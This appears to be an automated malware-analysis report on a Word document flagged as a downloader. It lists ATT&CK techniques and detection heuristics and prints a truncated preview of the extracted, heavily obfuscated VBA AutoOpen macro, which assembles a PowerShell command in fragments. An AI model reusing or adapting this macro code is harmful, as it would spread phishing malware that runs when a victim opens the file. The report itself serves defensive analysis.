Verdict: MALICIOUS
Risk Score: 250
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes Shell() and CreateObject() calls, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6704836-0' further supports its role as a downloader.
Heuristics: 8
- ClamAV: Doc.Downloader.Valyria-6704836-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON: Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60677 bytes |

SHA-256: 434be1ef9d3e9d48483bd84ca3a902b0f12dc1a1ab35e36ccccf793cd746ed6d
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
e_kuixtvhu = NaN
If 8629 >= 4178 Then
ieubdbdau = "$poglouhaouyi='a08 + 11';$"
End If
ymksie = NaN
Select Case 62 * 92
Case 5704
ipxiqk = "odyblodpvayioohstaoou='y Byp';"
yead5 = NaN
ieubdbdau = ieubdbdau + ipxiqk
Case ypfmguena76
qsmxwiy = NaN
End Select
ystux = NaN
Select Case "plngvx_gdsy"
Case "plngvx_gdsy"
bmcljhkfu_ybk = "$wiaatvofxaacbo_ea='{ "
keoekcoi = NaN
ieubdbdau = u_mntwhri + ieubdbdau + bmcljhkfu_ybk
End Select
aqaiymsz = NaN
If 66 - 64 = 2 Then
wicfdpu_j7 = "$u_';$m"
ieubdbdau = yloy + ieubdbdau + wicfdpu_j7 + msafzxub
End If
ljihzy = NaN
If 3526 < 1990 Then
Dim ldfiioqe8
ldfiioqe8 = NaN
kjfonwnfqyzf = NaN
ifmhkxqc = NaN
v_appioi = NaN
Else
ofn_ougxa = Environ("SystemRoot")
End If
srmujouxd = NaN
Select Case 72 * 46
Case 3312
uiyiy = ieubdbdau + ejurafkp
Dim irhnxzqhd_otb As String
irhnxzqhd_otb = NaN
eipnu = "rovtemqiebbsr"
kkeibld = NaN
uiyiy = uiyiy + eipnu
Case erudievg_o
iiugdkpd = NaN
End Select
yumy_o_yni = NaN
Select Case "ywzmxuboizq"
Case unhkntzpipo
inmyzrexg = NaN
Case "ywzmxuboizq"
fuayuakgo = qaa_nomyz + uiyiy + uigctkyvz
kkdvii = NaN
fuayuakgo = fuayuakgo + "ommygi_rofj='tion';$"
End Select
iqiec48 = NaN
If 1244 >= 1442 Then
cqtal = NaN
rkmqulm = NaN
ElseIf 3799 > 3177 Then
upvqbeee = "okpmlqslexjoidfhqn_y='$pat';$yhdirprdgnaiomk"
fuayuakgo = fuayuakgo + upvqbeee
Else
iebgr = NaN
Dim urdol As String
urdol = NaN
amjhbtdfydy = NaN
du_ejbwjd = NaN
End If
wsuaji = NaN
Select Case 20 - 96
Case 8777
yyayj = NaN
Case uoeiqeyu
aiuy3 = NaN
Case -76
yoyiiofe = uydnhwejnz + fuayuakgo + gmjvia
uozufftcz = NaN
yoyiiofe = iu_fewi + yoyiiofe + "af"
End Select
lz_afboi_qjy = NaN
If 4360 >= 8316 Then
ElseIf 93 * 91 = 4396 Then
Dim y_zdsuq
y_zdsuq = NaN
eioev = NaN
Else
aogea = e_oedacg_dze1 + yoyiiofe
eoyjnmuu = NaN
aogea = aogea + "nh='x.inf';$u_vdeauykabiyy0"
End If
tpcpaifj = NaN
Select Case 53 + 85
Case 138
o_uev = "7='yunr97"
hzdulbtdewq = NaN
aogea = aogea + o_uev
End Select
tlogwb = NaN
Select Case 70 + 46
Case afii
xhsqpuyajf = NaN
Case 116
iuocaemw = ooerwk + aogea + yifhgmtvq
qpaxas60 = NaN
iuocaemw = iuocaemw + "'')';$sjtmhccih_zo_sveofzomibxhrbeknjei"
End Select
yxtbp = NaN
Select Case "yzfstaytxy7"
Case "yzfstaytxy7"
rljpaeu_i_oa = "vu_oo='i"
meeyaxky = NaN
fjvaifni = NaN
uhqb_t = NaN
iuocaemw = iuocaemw + rljpaeu_i_oa
Case e_oftff_oee6
yczv_qjoye = NaN
Case 19733
yoiur = NaN
End Select
exbvui90 = NaN
Select Case 54 - 51
Case 3
aefpzojo = "le(1)';$oepyvti_gyuxipwoai"
qvou_mbe_n = NaN
iuocaemw = iuocaemw + aefpzojo
End Select
Dim qqofvifqi As String
qqofvifqi = NaN
If 8316 >= 3617 Then
ekwqb = "\syste"
ofn_ougxa = ofn_ougxa + ekwqb
Else
wewgxj = NaN
btttoixqtn = NaN
End If
yahqgd66 = NaN
If 44 + 19 = 25 Then
Dim aoolwiw As String
aoolwiw = NaN
ysdml_i = NaN
ElseIf 2 * 29 = 544 Then
sshoj = NaN
ufbeuq = NaN
Else
yixwl_oi = "='bcli';$qtik"
iuocaemw = iuocaemw + yixwl_oi + pduayjpo
End If
hsybdoi = NaN
Select Case 65 + 51
Case 116
jnsdh_la = iuocaemw
yozydfzo = NaN
jnsdh_la = jnsdh_la + "wja_eioiaer"
Case 24826
uigpwxae35 = NaN
Case 23636
Dim sbao_ey
sbao_ey = NaN
End Select
sczgzy = NaN
Select Case "aobhiht"
Case 18926
vteuicx = NaN
Case "aobhiht"
tlsquzn_wlle = jnsdh_la + oohcdyawta
bbokxaiu_o = NaN
tlsquzn_wlle = tlsquzn_wlle + "davqghiyamgyegnmvdyaut='uble]$"
Case 8928
hga_ebe = NaN
End Select
pvqsabk = NaN
Select Case "ou_yaxau77"
Case iksjrxeofy
dzzpitqh = NaN
Case yjnoeg
hqwae = NaN
Case "ou_yaxau77"
yketpsto = "a';$leiqdaikaupphgaoixrwlt"
ecrfqtqwi = NaN
tlsquzn_wlle = tlsquzn_wlle + yketpsto
End Select
hyey_qpi = NaN
pkeaov = NaN
io_iyu_bti = NaN
Select Case "excwtoq"
Case "e
... (truncated)